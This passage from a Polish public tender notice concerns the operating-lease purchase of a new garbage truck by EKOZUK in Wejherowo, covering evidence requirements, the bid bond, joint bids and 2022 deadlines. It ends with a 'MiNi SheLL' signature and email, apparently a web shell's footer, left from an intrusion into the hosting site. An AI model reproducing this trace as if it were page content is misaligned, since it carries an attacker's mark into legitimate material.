uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej 1 dostawę fabrycznie nowego pojazdu specjalistycznego w formie leasingu operacyjnego o wartości minimum 600.000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień<br/>złożenia podmiotowych środków dowodowych (chyba, że Zamawiający jest w posiadaniu lub ma<br/>dostęp do tych podmiotowych środków dowodowych) - w celu potwierdzenia braku podstaw<br/>wykluczenia, o których mowa w Rozdziale IX ust. 1 i 2 SWZ tj.:<br/>1) oświadczenia (zgodnie ze wzorem stanowiącym załącznik nr 4 do SWZ) Wykonawcy w zakresie art.<br/>108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu<br/>ustawy o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej<br/>grupy kapitałowej,<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej,<br/>zamiast dokumentu, o którym mowa w ust. 1 pkt 2, składa dokument lub dokumenty wystawione w<br/>kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto<br/>jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł<br/>układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w<br/>innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca<br/>wszczęcia tej procedury.<br/>3. Dokumenty , o których mowa w ust. 2, powinny być wystawione nie wcześniej niż 3 miesiące przed<br/>ich złożeniem.<br/>4. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się<br/>dokumentu, o którym mowa w ust. 1 pkt 2, zastępuje się go w całości lub w części dokumentem<br/>zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych<br/>do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą,<br/>lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce<br/>zamieszkania Wykonawcy. Przepis ust. 3 stosuje się.<br/>5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile<br/>Wykonawca wskazał w oświadczeniu na podstawie art. 125 ust. 1 (wzór - załącznik nr 2 do SWZ),<br/>dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający przed wyborem najkorzystniejszej oferty wezwie<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych (chyba, że<br/>Zamawiający jest w posiadaniu lub ma dostęp do tych podmiotowych środków dowodowych) - w celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu, dotyczących zdolności technicznej lub<br/>zawodowej w zakresie doświadczenia Wykonawcy, tj.:<br/>1) wykaz dostaw wykonanych (zgodnie ze wzorem stanowiącym załącznik nr 5 do SWZ), a w<br/>przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są<br/>wykonywane,<br/>UWAGA! Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw wykonywanych<br/>wspólnie z innymi Wykonawcami, wykaz, o którym mowa powyżej dotyczy dostaw, w których<br/>wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się<br/>lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>2) dowody określające, czy dostawy ujęte w wykazie dostaw, o którym mowa w pkt 1), zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w<br/>przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy.<br/>2. W przypadku polegania przez Wykonawcę na zdolnościach podmiotu udostępniającego zasoby<br/>(zgodnie z art. 118 ustawy Pzp), powyższy warunek musi spełniać w całości podmiot udostępniający<br/>zasoby.<br/>3. W przypadku, gdy w zamówieniu przedstawionym przez Wykonawcę jako spełniający w/w warunek,<br/>rozliczenie pomiędzy Wykonawcą a Zamawiającym za wykonane zamówienie zostało dokonane w<br/>innej walucie niż w złotych polskich, Wykonawca (dla celu oceny oferty) dokona przeliczenia wartości<br/>wykonanych zamówień w innej walucie niż w złotych polskich – na podstawie średniego kursu złotego<br/>w stosunku do walut obcych określonego w Tabeli Kursów A średnich walut obcych Narodowego<br/>Banku Polskiego (http://www.nbp.pl/home.aspx?f=/Kursy/kursy.html) na dzień wystawienia dokumentu.<br/>4. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów,<br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne<br/>przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości: 10.000,00 zł (słownie dziesięć tysięcy złotych 00/100).<br/>2. Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku formach, określonych w art. 97 ust. 7 ustawy Pzp, w zależności od wyboru Wykonawcy.<br/>3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego – Bank Millenium Spółka Akcyjna nr 56 1160 2202 0000 0003 5814 6591 z dopiskiem „Wadium – DKZ/03/2021/E – dostawa śmieciarki w leasingu”.<br/>UWAGA! Za termin wniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku Zamawiającego. Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych, Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem.<br/>4. Wadium wnoszone w formie gwarancji lub poręczenia przekazuje się w oryginale w postaci elektronicznej.<br/>5. Wadium w formie gwarancji lub poręczenia musi spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie Pzp,<br/>2) z jego treści powinno jednoznacznie wynikać zobowiązanie gwaranta/poręczyciela do zapłaty całej kwoty wadium,<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie,<br/>21| S t r o n a<br/>4) nie może zawierać zastrzeżenia gwaranta/poręczyciela, o konieczności potwierdzenia podpisów Zamawiającego na pisemnym wezwaniu do zapłaty przez bank prowadzący rachunek Zamawiającego, jak również innych dodatkowych zastrzeżeń i warunków,<br/>5) termin obowiązywania gwarancji/poręczenia nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień składania ofert),<br/>6) w treści gwarancji/poręczenia powinna znaleźć się nazwa oraz numer przedmiotowego postępowania,<br/>7) beneficjentem gwarancji/poręczenia jest EKOZUK Sp. z o.o., ul. Obrońców Helu 1, 84-200 Wejherowo,<br/>8) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający wymaga aby gwarancja/poręczenie obejmowało swą treścią (tj. zobowiązanych z tytułu gwarancji/poręczenia) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenia zamówienia,<br/>9) musi mieć taką samą płynność jak wadium wniesione w pieniądzu - dochodzenie roszczenia z tytułu wadium wniesionego w formie gwarancji lub poręczenia nie może być utrudnione. Dlatego w treści gwarancji lub poręczenia powinna znaleźć się klauzula, iż wszystkie spory odnośnie gwarancji lub poręczenia będą rozstrzygane zgodnie z prawem polskim i poddane jurysdykcji sądów polskich, chyba, że wynika to z przepisów prawa.<br/>6. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo należy załączyć do oferty.<br/>UWAGA! Treść pełnomocnictwa powinna dokładnie określać zakres umocowania oraz dane<br/>mocodawców i pełnomocnika.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o<br/>którym mowa w art. 125 ust. 1 Pzp (oświadczenie o braku podstaw wykluczenia i spełnianiu<br/>warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik nr 2 do SWZ),<br/>składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>4. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, każdy z<br/>nich zobowiązany jest złożyć, na wezwanie Zamawiającego, podmiotowe środki dowodowe<br/>potwierdzające brak podstaw wykluczenia z postępowania, tj. 1) oświadczenia (zgodnie ze<br/>wzorem stanowiącym załącznik nr 4 do SWZ) Wykonawcy w zakresie art. 108 ust. 1 pkt 5<br/>ustawy Pzp, o braku przynależności do tej samej grupy<br/>kapitałowej, w rozumieniu ustawy o ochronie konkurencji i konsumentów, z innym Wykonawcą,<br/>który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej<br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od<br/>innego Wykonawcy należącego do tej samej grupy kapitałowej,<br/>2) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek<br/>udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej w zakresie<br/>doświadczenia Wykonawcy, tj.: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca<br/>wykaże, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wykonał należycie co najmniej 1 (jedną) dostawę fabrycznie nowego pojazdu specjalistycznego w formie leasingu operacyjnego o wartości minimum 600.000,00 zł brutto, musi spełniać w całości co<br/>najmniej jeden z tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Dopuszczalna jest zmiana umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia wyłącznie w przypadkach i na zasadach określonych w Dziale VII Rozdz. 3 ustawy Pzp.<br/>2.	Zmiana postanowień umowy może nastąpić za zgodą obu Stron wyrażona na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złozyc na platformie zakupowej Zamawiającego pod adresem: https://zukwejherowo.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-22 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com